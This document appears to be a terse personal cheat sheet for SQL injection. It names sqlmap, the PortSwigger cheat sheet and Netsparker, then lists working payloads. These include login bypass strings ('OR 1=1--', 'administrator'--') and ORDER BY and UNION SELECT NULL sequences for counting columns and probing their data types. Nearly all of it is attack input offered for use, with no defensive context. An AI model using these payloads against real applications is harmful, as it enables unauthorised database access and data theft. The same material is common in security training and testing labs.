Sql injection…
use sqlmap
portswigger cheat sheet
netsparker
try using:
'--
'+OR+1=1--
administrator'--
' union select
of course all ‘ ‘ should be replaced by ‘+’
number of columns
' order by 1--
' order by 2--
' order by 3--
or
' union select null--
' union select null,null--
' union select null,null,null--
find data type
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--